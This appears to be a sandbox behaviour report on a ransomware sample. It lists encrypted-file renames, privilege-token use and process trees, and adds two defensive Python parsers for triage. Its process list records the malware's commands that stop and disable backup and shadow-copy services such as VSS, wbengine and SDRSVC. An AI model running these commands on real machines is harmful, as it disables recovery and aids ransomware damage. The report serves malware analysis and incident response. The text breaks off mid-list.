File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\XLMACRO.CHM.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_hFw4qPprcfw0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\LinkedInboxSmallTile.scale-150.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\StopwatchLargeTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxCalendarLogoExtensions.scale-32.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Assets\SkypeAppList.targetsize-16_contrast-white.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-32_altform-unplated_contrast-white.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\EMLAttachmentIcon.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hr-hr\ui-strings.js.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_5VoCNMUwgMM0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
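The renamed files in the table above all follow one pattern: the original name, a dot, a 43-character base64url-style token that is identical across every renamed file in this report, an underscore, a 12-character token that differs per file, and the extension .8zvpm. The files under WindowsApps appear in the table without that suffix. The parser below is an added example, not part of the sandbox report or of the malware; it decomposes such names so a responder can recover original filenames and scope the affected set from a directory listing. The sample paths are copied from the table above. What the two tokens encode is not stated on this page and the parser does not interpret them.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Naming pattern observed in the "File opened for modification" rows of this report:
#   <original name>.<43-char token>_<12-char token>.8zvpm
# Both tokens use the base64url alphabet. The 43-char token is the same for every
# renamed file in the report; the 12-char token differs per file. Their meaning is
# not stated on the page, so they are only extracted, never interpreted.
ENC_SUFFIX_RE = re.compile(
    r"^(?P<original>.+)\."
    r"(?P<shared_token>[A-Za-z0-9_-]{43})_"
    r"(?P<file_token>[A-Za-z0-9_-]{12})"
    r"\.8zvpm$"
)


@dataclass(frozen=True)
class RenamedFile:
    path: str
    original_name: str
    shared_token: str
    file_token: str


def parse_renamed(path: str) -> Optional[RenamedFile]:
    """Return the decomposed name if `path` carries the encrypted-file suffix, else None."""
    _directory, _sep, name = path.rpartition("\\")
    m = ENC_SUFFIX_RE.match(name)
    if not m:
        return None
    return RenamedFile(path, m["original"], m["shared_token"], m["file_token"])


def triage(paths):
    """Split touched paths into renamed (suffix present) and untouched-name files and
    report whether all renamed files share one 43-char token."""
    renamed, untouched = [], []
    for p in paths:
        r = parse_renamed(p)
        if r is None:
            untouched.append(p)
        else:
            renamed.append(r)
    tokens = {r.shared_token for r in renamed}
    return {
        "renamed": renamed,
        "not_renamed": untouched,
        "shared_tokens": tokens,
        "single_shared_token": len(tokens) == 1,
    }


# Sample input: a subset of the paths listed in the table above (copied from this report).
SAMPLE_PATHS = [
    r"C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\MANIFEST.MF.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_bO-IqtT12240.8zvpm",
    r"C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_XabFKKF90ys0.8zvpm",
    r"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_wt0cMuQ9gKk0.8zvpm",
    r"C:\Program Files\Microsoft Office\root\Office16\1033\XLMACRO.CHM.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_hFw4qPprcfw0.8zvpm",
    r"C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\Assets\contrast-black\PeopleLargeTile.scale-200.png",
    r"C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\Voices\beeps\uncommon.lua",
]

if __name__ == "__main__":
    result = triage(SAMPLE_PATHS)
    for r in result["renamed"]:
        print(f"{r.original_name:<24} file_token={r.file_token}")
    print("shared token(s):", result["shared_tokens"])
    print("opened but not renamed:", len(result["not_renamed"]))
```

Point the same function at a recursive listing of an affected volume to get the set of original names; if more than one shared token turns up across hosts, treat that as a reason to keep the hosts separate during recovery rather than assume one key set.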

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Privileges 33 to 36 are reported by LUID only. In winnt.h those LUIDs are SeIncreaseWorkingSetPrivilege (33), SeTimeZonePrivilege (34), SeCreateSymbolicLinkPrivilege (35) and SeDelegateSessionUserImpersonatePrivilege (36).

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2940 wrote to memory of 3164 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\net.exe
PID 2940 wrote to memory of 3164 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\net.exe
PID 3164 wrote to memory of 672 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3164 wrote to memory of 672 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2940 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\net.exe
PID 2940 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\net.exe
PID 1368 wrote to memory of 1164 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1368 wrote to memory of 1164 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2940 wrote to memory of 972 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\net.exe
PID 2940 wrote to memory of 972 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\net.exe
PID 972 wrote to memory of 2460 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 972 wrote to memory of 2460 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2940 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\net.exe
PID 2940 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\net.exe
PID 1064 wrote to memory of 380 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1064 wrote to memory of 380 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2940 wrote to memory of 3796 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\net.exe
PID 2940 wrote to memory of 3796 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\net.exe
PID 3796 wrote to memory of 4000 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3796 wrote to memory of 4000 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2940 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\net.exe
PID 2940 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\net.exe
PID 1988 wrote to memory of 3632 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1988 wrote to memory of 3632 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2940 wrote to memory of 3844 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\net.exe
PID 2940 wrote to memory of 3844 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\net.exe
PID 3844 wrote to memory of 1472 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3844 wrote to memory of 1472 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2940 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\net.exe
PID 2940 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\net.exe
PID 3032 wrote to memory of 2212 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3032 wrote to memory of 2212 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2940 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\net.exe
PID 2940 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\net.exe
PID 2112 wrote to memory of 2092 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2112 wrote to memory of 2092 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2940 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\sc.exe
PID 2940 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\sc.exe
PID 2940 wrote to memory of 696 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\sc.exe
PID 2940 wrote to memory of 696 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\sc.exe
PID 2940 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\sc.exe
PID 2940 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\sc.exe
PID 2940 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\sc.exe
PID 2940 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\sc.exe
PID 2940 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\sc.exe
PID 2940 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\sc.exe
PID 2940 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\sc.exe
PID 2940 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\sc.exe
PID 2940 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\sc.exe
PID 2940 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\sc.exe
PID 2940 wrote to memory of 1228 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\sc.exe
PID 2940 wrote to memory of 1228 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\sc.exe
PID 2940 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\sc.exe
PID 2940 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\sc.exe
PID 2940 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\reg.exe
PID 2940 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\reg.exe
PID 2940 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\reg.exe
PID 2940 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\reg.exe
PID 2940 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\reg.exe
PID 2940 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\reg.exe
PID 2940 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\reg.exe
PID 2940 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\reg.exe
PID 2940 wrote to memory of 668 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\reg.exe
PID 2940 wrote to memory of 668 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\reg.exe
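Every row above is logged twice and records only a parent-to-child PID pair, so the process tree has to be rebuilt before it is readable. The script below is an added example, not part of the sandbox report: it parses rows in exactly this format, collapses repeated edges, and renders the tree from each root. The sample rows are a subset copied from the table above.

```python
import re
from collections import OrderedDict

# Row format of the "Suspicious use of WriteProcessMemory" table in this report:
#   PID <parent> wrote to memory of <child> N/A <parent image> <child image>
# Image paths may contain spaces, so the parent image is matched lazily up to the
# next whitespace-separated drive-letter path.
ROW_RE = re.compile(
    r"^PID\s+(?P<parent>\d+)\s+wrote to memory of\s+(?P<child>\d+)\s+N/A\s+"
    r"(?P<parent_image>[A-Za-z]:\\.*?)\s+(?P<child_image>[A-Za-z]:\\.*)$"
)


def parse_rows(rows):
    """Yield (parent_pid, child_pid, parent_image, child_image) for each row that parses."""
    for row in rows:
        m = ROW_RE.match(row.strip())
        if m:
            yield int(m["parent"]), int(m["child"]), m["parent_image"], m["child_image"]


def build_tree(rows):
    """Return (children, images). children maps a PID to its unique child PIDs in
    first-seen order; images maps each PID to its image path. Rows that repeat the
    same parent/child pair (every edge in the table is logged twice) collapse to one edge."""
    children = OrderedDict()
    images = {}
    for ppid, cpid, pimg, cimg in parse_rows(rows):
        images.setdefault(ppid, pimg)
        images.setdefault(cpid, cimg)
        kids = children.setdefault(ppid, [])
        if cpid not in kids:
            kids.append(cpid)
    return children, images


def roots(children):
    """PIDs that appear as a parent but never as a child."""
    seen_as_child = {c for kids in children.values() for c in kids}
    return [p for p in children if p not in seen_as_child]


def render(children, images, root, depth=0):
    """Return the subtree under `root` as indented 'pid image' lines."""
    lines = [f"{'  ' * depth}{root} {images.get(root, '?')}"]
    for kid in children.get(root, []):
        lines.extend(render(children, images, kid, depth + 1))
    return lines


# Sample rows copied from the table above (a subset; the doubled rows are kept as logged).
SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe"
SAMPLE_ROWS = [
    rf"PID 2940 wrote to memory of 3164 N/A {SAMPLE} C:\Windows\SYSTEM32\net.exe",
    rf"PID 2940 wrote to memory of 3164 N/A {SAMPLE} C:\Windows\SYSTEM32\net.exe",
    r"PID 3164 wrote to memory of 672 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe",
    r"PID 3164 wrote to memory of 672 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe",
    rf"PID 2940 wrote to memory of 1232 N/A {SAMPLE} C:\Windows\SYSTEM32\sc.exe",
    rf"PID 2940 wrote to memory of 1232 N/A {SAMPLE} C:\Windows\SYSTEM32\sc.exe",
    rf"PID 2940 wrote to memory of 2132 N/A {SAMPLE} C:\Windows\SYSTEM32\reg.exe",
    rf"PID 2940 wrote to memory of 2132 N/A {SAMPLE} C:\Windows\SYSTEM32\reg.exe",
]

if __name__ == "__main__":
    children, images = build_tree(SAMPLE_ROWS)
    for root in roots(children):
        print("\n".join(render(children, images, root)))
```

Feeding the full table through build_tree gives one root (the sample, PID 2940) with every net.exe, sc.exe and reg.exe child hanging directly off it, and each net.exe with a single net1.exe child; that flat fan-out from one parent is the shape to look for in EDR process telemetry.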

Processes

C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe

"C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe"

C:\Windows\SYSTEM32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "vmicvss" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "vmicvss" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "UnistoreSvc_12dde" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UnistoreSvc_12dde" /y

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SYSTEM32\sc.exe

